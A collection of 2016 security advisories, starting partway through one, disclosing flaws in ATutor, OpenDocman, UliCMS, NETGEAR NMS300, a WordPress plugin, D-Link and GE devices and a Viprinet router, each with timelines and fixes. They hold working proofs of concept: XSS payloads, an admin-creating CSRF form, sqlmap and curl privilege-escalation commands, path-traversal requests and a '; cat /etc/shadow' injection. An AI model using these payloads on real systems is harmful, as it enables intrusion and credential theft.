[+]fields[email] (POST)
[+]action[save] (POST)
Affected Area(s):
[+]
http://localhost/symphony2.6.3/symphony-2.6.3/symphony/system/authors/new/
================================================================
Disclosure Timeline:
Vendor notification: Jan 29, 2016
Public disclosure: Jan 30, 2016
Credits & Authors
================================================================
Sachin Wagh (@tiger_tigerboy)
-- Best Regards, *Sachin Wagh*
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Atutor 2.2
Fixed in: partly in ATutor 2.2.1-RC1, complete in 2.2.1
Fixed Version Link: http://www.atutor.ca/atutor/download.php
Vendor Website: http://www.atutor.ca/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 02/01/2016
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Atutor is a learning management system (LMS) written in PHP. In version 2.2, it
is vulnerable to multiple reflected and persistent XSS attacks.
The vulnerabilities can lead to the stealing of cookies, injection of
keyloggers, or the bypassing of CSRF protection. If the victim is an admin, a
successful exploitation can lead to code execution via the theme uploader, and
if the victim is an instructor, this can lead to code execution via a file
upload vulnerability in the same version of Atutor.
3. Details
XSS 1: Reflected XSS - Calendar
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description: The calendar_next parameter of the calendar is vulnerable to XSS.
This issue has been fixed in ATutor 2.2.1-RC1.
Proof of Concept:
http://localhost/ATutor/mods/_standard/calendar/getlanguage.php?token=calendar_next<script>alert(1)<%2fscript>&pub=1
Code:
/mods/_standard/calendar/getlanguage.php
$token = $_GET['token'];
echo _AT($token);
XSS 2: Persistent XSS - Profile
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
Description: When saving profile information, < is filtered out. < on the
other hand is not filtered, but converted to <, which leads to persistent XSS.
A user account is needed, but registration is open by default. This issue has
been fixed in ATutor 2.2.1.
Proof of Concept:
Visit:
http://localhost/ATutor/users/profile.php
In any field, enter
<img src=no onerror=alert(1)>
The input is for example echoed when visiting http://localhost/ATutor/users/
profile.php. This self-XSS may be exploited by force-logging in the victim.
The input is not only echoed to the user themselves, but also in other places.
For example, an attacker could send a private message to a victim. When the
victim views the message, or visits their inbox, the injected code will be
executed.
XSS 3: Persistent XSS - Forum
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
Description: When creating a forum post, the Subject parameter is vulnerable to
persistent XSS.
A user account is needed, but registration is open by default. This issue has
been fixed in ATutor 2.2.1.
Proof of Concept:
Visit a forum, eg here:
http://localhost/ATutor/mods/_standard/forums/forum/view.php?fid=1&pid=1
Post a new message, as Subject, use:
Re: test topic'"><img src=no onerror=alert(1)>
In ATutor 2.2.1-RC1, < and > are encoded, preventing the proof of concept from
working. But until version 2.2.1, it was still possible to exploit this issue
either by using the JavaScript context the input is echoed into (onClick), or
by adding a new attribute:
adding new attributes:
Re: ';" onmouseover="alert(1); var foo='
staying inside the existing JavaScript context:
Re: test topic';alert(1);var foo='
XSS 4: Persistent self-XSS - Calendar
CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N
Description: The event name of the calendar is vulnerable to persistent XSS.
The calendar seems to be shown only to the user creating it, meaning the only
way to exploit this issue would be to force-login the victim.
A user account is needed, but registration is open by default. This issue has
been fixed in ATutor 2.2.1-RC1.
Proof of Concept:
Visit: http://localhost/ATutor/mods/_standard/calendar/index_mystart.php
Create event with name:
'"><img src=no onerror=alert(1)>
Visit event page: http://localhost/ATutor/mods/_standard/calendar/index_mystart.php
XSS 5: Persistent XSS - Chat
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
Description: When viewing the chat history, chat messages are not properly HTML
encoded, leading to persistent XSS.
A user account is needed, but registration is open by default. This issue has
been fixed in ATutor 2.2.1-RC1.
Proof of Concept:
1. Visit Chat:
http://localhost/ATutor/mods/_standard/chat/chat.php
2. Enter chat message:
'"><img src=no onerror=alert(1)>
3. Visit chat history of that user:
http://localhost/ATutor/mods/_standard/chat/filterHistory.php?filterChatID=[USERNAME]
4. Solution
To mitigate this issue please upgrade at least to version 2.2.1:
http://www.atutor.ca/atutor/download.php
Please note that a newer version might already be available.
5. Report Timeline
11/17/2015 Informed Vendor about Issue
11/21/2015 Vendor requests more time
01/06/2016 Vendor releases new release candidate with partial fix
01/30/2016 Vendor releases complete fix
02/01/2016 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/Atutor-22-XSS-149.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: Opendocman 1.3.4
Fixed in: 1.3.5
Fixed Version Link: http://www.opendocman.com/free-download/
Vendor Website: http://www.opendocman.com/
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 02/01/2016
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
CVSS
Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P
Description
Opendocman does not have CSRF protection, which means that an attacker can
perform actions for an admin, if the admin visits an attacker controlled
website while logged in.
3. Proof of Concept
Add new Admin User:
<html>
<body>
<form action="http://localhost/opendocman-1.3.4/user.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="last_name" value="test" />
<input type="hidden" name="first_name" value="test" />
<input type="hidden" name="username" value="test" />
<input type="hidden" name="phonenumber" value="1214532" />
<input type="hidden" name="password" value="12345678" />
<input type="hidden" name="Email" value="test@example.com" />
<input type="hidden" name="department" value="1" />
<input type="hidden" name="admin" value="1" />
<input type="hidden" name="can_add" value="1" />
<input type="hidden" name="can_checkin" value="1" />
<input type="hidden" name="submit" value="Add User" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
4. Solution
To mitigate this issue please upgrade at least to version 1.3.5:
http://www.opendocman.com/free-download/
Please note that a newer version might already be available.
5. Report Timeline
11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of disclosure date
12/19/2015 Vendor sends fix for CSRF for verification
01/13/2016 Confirmed CSRF fix
01/20/2016 Vendor requests more time to fix other issues in same version
01/31/2016 Vendor releases fix
02/01/2015 Disclosed to public
Blog Reference:
https://blog.curesec.com/article/blog/Opendocman-134-CSRF-150.html
--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
=============================================
MGC ALERT 2016-001
- Original release date: January 26, 2016
- Last revised: February 02, 2016
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=============================================
I. VULNERABILITY
-------------------------
Time-based SQL Injection in Admin panel UliCMS <= v9.8.1
II. BACKGROUND
-------------------------
UliCMS is a modern web content management solution from Germany, that
attempts to make web content management more easier.
III. DESCRIPTION
-------------------------
This bug was found using the portal with authentication as administrator.
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.
It is possible to inject SQL code in the variable "country_blacklist" on
the page "action=spam_filter".
IV. PROOF OF CONCEPT
-------------------------
The following URL's and parameters have been confirmed to all suffer from
Time Based Blind SQL injection.
/ulicms/admin/?action=spam_filter
(POST)
spamfilter_enabled=yes&spamfilter_words_blacklist=a&country_blacklist=ru&submit_spamfilter_settings=Save+Changes
POC using SQLMap:
sqlmap -u "http://127.0.0.1/ulicms/admin/?action=spam_filter" --cookie="SET
COOKIE HERE"
--data="spamfilter_enabled=yes&spamfilter_words_blacklist=a&country_blacklist=ru&submit_spamfilter_settings=Save+Changes"
-p "country_blacklist" --dbms="mysql" --dbs
V. BUSINESS IMPACT
-------------------------
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
VI. SYSTEMS AFFECTED
-------------------------
UliCMS <= v9.8.1
VII. SOLUTION
-------------------------
Install vendor patch.
VIII. REFERENCES
-------------------------
http://en.ulicms.de/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
January 26, 2016 1: Initial release
February 02, 2015 2: Revision to send to lists
XI. DISCLOSURE TIMELINE
-------------------------
January 26, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
January 26, 2016 2: Send to vendor
January 28, 2016 3: Vendor fix vulnerability
February 02, 2016 4: Send to the Full-Disclosure lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
>> Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
==========================================================================
Disclosure: 04/02/2016 / Last updated: 04/02/2016
>> Background on the affected product:
"NMS300
ProSAFE® Network Management System
Diagnose, control, and optimize your network devices.
The NETGEAR Management System NMS300 delivers insight into network elements, including third-party devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network."
>> Summary:
Netgear's NMS300 is a network management utility that runs on Windows systems. It has serious two vulnerabilities that can be exploited by a remote attacker. The first one is an arbitrary file upload vulnerability that allows an unauthenticated attacker to execute Java code as the SYSTEM user.
The second vulnerability is an arbitrary file download that allows an authenticated user to download any file from the host that is running NMS300.
A special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1]. Two new Metasploit modules that exploit these vulnerabilities have been released.
>> Technical details:
#1
Vulnerability: Remote code execution via arbitrary file upload (unauthenticated)
CVE-2016-1525
Affected versions:
NMS300 1.5.0.11
NMS300 1.5.0.2
NMS300 1.4.0.17
NMS300 1.1.0.13
There are two servlets that allow unauthenticated file uploads:
@RequestMapping({ "/fileUpload.do" })
public class FileUpload2Controller
- Uses spring file upload
@RequestMapping({ "/lib-1.0/external/flash/fileUpload.do" })
public class FileUploadController
- Uses flash upload
The JSP file can be uploaded as shown below, it will be named null[name].[extension] and can be reached on http://[host]:8080/null[name].[extension].
So for example if [name] = "testing" and [extension] = ".jsp", the final file will be named "nulltesting.jsp". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user.
POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1
Content-Type: multipart/form-data; boundary=----------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="name"
[name]
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3
Content-Disposition: form-data; name="Filedata"; filename="whatever.[extension]"
Content-Type: application/octet-stream
<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
pageEncoding="ISO-8859-1"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Hello World Example</title>
</head>
<body>
<h2>A Hello World Example of JSP.</h2>
</body>
</html>
------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3--
#2
Vulnerability: Arbitrary file download (authenticated)
CVE-2016-1524
Affected versions:
NMS300 1.5.0.11
NMS300 1.5.0.2
NMS300 1.4.0.17
NMS300 1.1.0.13
Three steps need to be taken in order to exploit this vulnerability:
a) Add a configuration image, with the realName parameter containing the path traversal to the target file:
POST /data/config/image.do?method=add HTTP/1.1
realName=../../../../../../../../../../<file on C:\>&md5=&fileName=<imagename.img>&version=1337&vendor=Netgear&deviceType=4&deviceModel=FS526Tv2&description=bla
b) Obtain the file identifier (imageId) for the image that was created by scraping the page below for "imagename.img" (the fileName parameter in step 1):
POST /data/getPage.do?method=getPageList&type=configImgManager
everyPage=10000
Sample response:
{"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.img","createTime":"10/03/2015 21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor":"Netgear","deviceType":"4","deviceModel":"FS526Tv2","version":"2323","sizeM":"24491","createBy":"admin","createId":"1","description":"bla\r\n"}
c) Download the file with the imageId obtained in step 2:
GET /data/config/image.do?method=export&imageId=<ID>
>> Fix:
No fix is currently available. It is recommended not to expose NMS300 to the Internet or any unstrusted networks.
>> References:
[1] https://www.kb.cert.org/vuls/id/777024
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
* Exploit Title: WordPress User Meta Manager Plugin [Privilege Escalation]
* Discovery Date: 2015/12/28
* Public Disclosure Date: 2016/02/04
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://jasonlau.biz/home/
* Software Link: https://wordpress.org/plugins/user-meta-manager/
* Version: 3.4.6
* Tested on: WordPress 4.4.1
* Category: webapps
Description
================================================================================
User Meta Manager for WordPress plugin up to v3.4.6 suffers from a privilege
escalation vulnerability. A registered user can modify the meta information of
any registered user, including himself. This way he can modify `wp_capabilities`
meta to escalate his account to a full privileged administrative account.
PoC
================================================================================
curl -c ${USER_COOKIES} \
-d "mode=edit&umm_meta_value[]=a:1:{s:13:\"administrator\";b:1;}\
&umm_meta_key[]=wp_capabilities" \
"http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
&umm_sub_action=umm_update_user_meta&umm_user=${USER_ID}"
Timeline
================================================================================
2015/12/28 - Discovered
2015/12/29 - Vendor notified via support forums in WordPress.org
2015/12/29 - Vendor notified via contact form in his site
2016/01/29 - WordPress security team notified about the issue
2016/02/02 - Vendor released version 3.4.7
2016/02/02 - Verified that this exploit no longer applies in version 3.4.7
Solution
================================================================================
No official solution yet exists.
* Exploit Title: WordPress User Meta Manager Plugin [Blind SQLI]
* Discovery Date: 2015/12/28
* Public Disclosure Date: 2016/02/04
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://jasonlau.biz/home/
* Software Link: https://wordpress.org/plugins/user-meta-manager/
* Version: 3.4.6
* Tested on: WordPress 4.4.1
* Category: webapps
Description
================================================================================
AJAX actions `umm_edit_user_meta` and `umm_delete_user_meta` of the User Meta
Manager for WordPress plugin up to v3.4.6 are vulnerable to blind SQL injection
attacks. A registered user can pass arbitrary MySQL commands to `umm_user` GET
param.
PoC
================================================================================
curl -c ${USER_COOKIES} \
"http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
&umm_sub_action=[umm_delete_user_meta|umm_edit_user_meta]&umm_user=SLEEP(5)"
Timeline
================================================================================
2015/12/28 - Discovered
2015/12/29 - Vendor notified via support forums in WordPress.org
2015/12/29 - Vendor notified via contact form in his site
2016/01/29 - WordPress security team notified about the issue
2016/02/02 - Vendor released version 3.4.7
2016/02/02 - Verified that this exploit no longer applies in version 3.4.7
Solution
================================================================================
Update to version 3.4.7
# Exploit Title: [DLink DVGN5402SP Multiple Vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.dlink.com/]
# Versions Reported: [Multiple - See below]
# CVE-IDs: [CVE-2015-7245 + CVE-2015-7246 + CVE-2015-7247]
*DLink DVGN5402SP File Path Traversal, Weak Credentials Management, and
Sensitive Info Leakage Vulnerabilities*
*Vulnerable Models, Firmware, Hardware versions*
DVGN5402SP Web Management
Model Name : GPN2.4P21CCN
Firmware Version : W1000CN00
Firmware Version :W1000CN03
Firmware Version :W2000EN00
Hardware Platform :ZS
Hardware Version :Gpn2.4P21C_WIFIV0.05
Device can be managed through three users:
1. super full privileges
2. admin full privileges
3. support restricted user
*1. Path traversal*
Arbitrary files can be read off of the device file system. No
authentication is required to exploit this vulnerability.
*CVE-ID*: CVE-2015-7245
*HTTP Request *
POST /cgibin/webproc HTTP/1.1
Host: <IP>:8080
UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101
Firefox/39.0 Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
AcceptLanguage: enUS,en;q=0.5
AcceptEncoding: gzip, deflate
Referer: http://<IP>:8080/cgibin/webproc
Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super
Connection: keepalive
ContentType: application/xwwwformurlencoded
ContentLength: 223
getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var%
&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
*HTTP Response*
HTTP/1.0 200 OK
pstVal>name:getpage; pstVal>value:html/main.html
pstVal>name:getpage; pstVal>value:html/index.html
pstVal>name:errorpage;
pstVal>value:../../../../../../../../../../../etc/shadow
pstVal>name:var:menu; pstVal>value:setup
pstVal>name:var:page; pstVal>value:connected
pstVal>name:var:subpage; pstVal>value:
pstVal>name:objaction; pstVal>value:auth
pstVal>name::username; pstVal>value:super
pstVal>name::password; pstVal>value:super
pstVal>name::action; pstVal>value:login
pstVal>name::sessionid; pstVal>value:1ac5da6b
Connection: close
Contenttype: text/html
Pragma: nocache
CacheControl: nocache
setcookie: sessionid=1ac5da6b; expires=Fri, 31Dec9999 23:59:59 GMT;
path=/
#root:<hash_redacted>:13796:0:99999:7:::
root:<hash_redacted>:13796:0:99999:7:::
#tw:<hash_redacted>:13796:0:99999:7:::
#tw:<hash_redacted>:13796:0:99999:7:::
*2. Use of Default, HardCoded Credentials**CVE-ID*: CVE-2015-7246
The device has two system user accounts configured with default passwords
(root:root, tw:tw).
Login tw is not active though. Anyone could use the default password to
gain administrative control through the Telnet service of the system (when
enabled) leading to integrity, loss of confidentiality, or loss of
availability.
*3.Sensitive info leakage via device running configuration backup *
*CVE-ID*: CVE-2015-7247
Usernames, Passwords, keys, values and web account hashes (super & admin)
are stored in cleartext and not masked. It is noted that restricted
'support' user may also access this config backup file from the portal
directly, gather clear-text admin creds, and gain full, unauthorized access
to the device.
--
Best Regards,
Karn Ganeshen
ipositivesecurity.blogspot.in
# Exploit Title: [GE Industrial Solutions - UPS SNMP Adapter Command
Injection and Clear-text Storage of Sensitive Information Vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [http://www.geindustrial.com/]
# Versions Reported: [All SNMP/Web Interface cards with firmware version
prior to 4.8 manufactured by GE Industrial Solutions.]
# CVE-IDs: [CVE-2016-0861 + CVE-2016-0862]
*GE Advisory: *
http://apps.geindustrial.com/publibrary/checkout/GEIS_SNMP?TNR=Application%20and%20Technical|GEIS_SNMP|PDF&filename=GEIS_SNMP.pdf
*ICS-CERT Advisory:*https://ics-cert.us-cert.gov/advisories/ICSA-16-033-02
*About GE*
GE is a US-based company that maintains offices in several countries around
the world.
The affected product, SNMP/Web Interface adapter, is a web server designed
to present information about the Uninterruptible Power Supply (UPS).
According to GE, the SNMP/Web Interface is deployed across several sectors
including Critical Manufacturing and Energy. GE estimates that these
products are used worldwide.
*Affected Products*
• All SNMP/Web Interface cards with firmware version prior to 4.8
manufactured by GE Industrial Solutions.
*VULNERABILITY OVERVIEW*
A
*COMMAND INJECTIONCVE-2016-0861*
Device application services run as (root) privileged user, and does not
perform strict input validation. This allows an authenticated user to
execute any system commands on the system.
Vulnerable function:
http://IP/dig.asp <http://ip/dig.asp>
Vulnerable parameter:
Hostname/IP address
*PoC:*
In the Hostname/IP address input, enter:
; cat /etc/shadow
Output
root:<hash>:0:0:root:/root:/bin/sh
<...other system users...>
ge:<hash>:101:0:gedeups7:/home/admin:/bin/sh
root123:<hash>:102:0:gedeups2:/home/admin:/bin/sh
B
*CLEARTEXT STORAGE OF SENSITIVE INFORMATIONCVE-2016-0862*
File contains sensitive account information stored in cleartext. All users,
including non-admins, can view/access device's configuration, via Menu
option -> Save -> Settings.
The application stores all information in clear-text, including *all user
logins and clear-text passwords*.
--
Best Regards,
Karn Ganeshen
ipositivesecurity.blogspot.in
Vulnerability title: Multiple Instances Of Cross-site Scripting In Viprinet Multichannel VPN Router 300
CVE: CVE-2014-2045
Vendor: Viprinet
Product: Multichannel VPN Router 300
Affected version: 2013070830/2013080900
Fixed version: 2014013131/2014020702
Reported by: Tim Brown
Details:
The data supplied to both the `old’ and `new’ web applications (the device has two web based management interfaces) was permanently stored and could be retrieved later by other users. This is a normal feature of many applications, however, in this instance the application failed to restrict the type of data that could be stored and also failed to sanitise it, meaning that it could not be safely rendered by the browser.
Stored cross-site scripting could be triggered by:
Attempting to login with a username of `<script>alert(1)</script>’ (affects `old’ interface and results in post-authentication cross-site Scripting when a legitimate administrator views the realtime log)
Creating an account with a username of `<script>alert(1)</script>’ (affects both `old’ and `new’ interfaces once created)
Setting the device’s hostname to `<script>alert(1)</script>’ (affects `old’ interface once created)
A number of locations were identified as being vulnerable to reflective attacks, including:
http://<host>/exec?module=config&sessionid=<sessionid>&inspect=%3Cscript%20src=http://localhost:9090%3E%3C/script%3E
http://<host>/exec?tool=atcommands&sessionid=<sessionid>&sourceobject=WANINTERFACELIST.OBJECT__0&module=configtools&commands=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://<host>/exec?tool=ping&sessionid=<sessionid>&sourceobject=WANINTERFACELIST.OBJECT__0&module=configtools&host=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pingcount=3&databytes=56
The inclusion of session IDs in all URLs partially mitigates the reflective cross-site scripting but could itself be considered a vulnerability since it is included in referred headers and log files.
These are simply some examples of how this attack might be performed, and the it is believed that both the `old’ and `new’ web applications are systemically vulnerable to this.
Further details at:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2045/
Copyright:
Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
Disclaimer:
The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.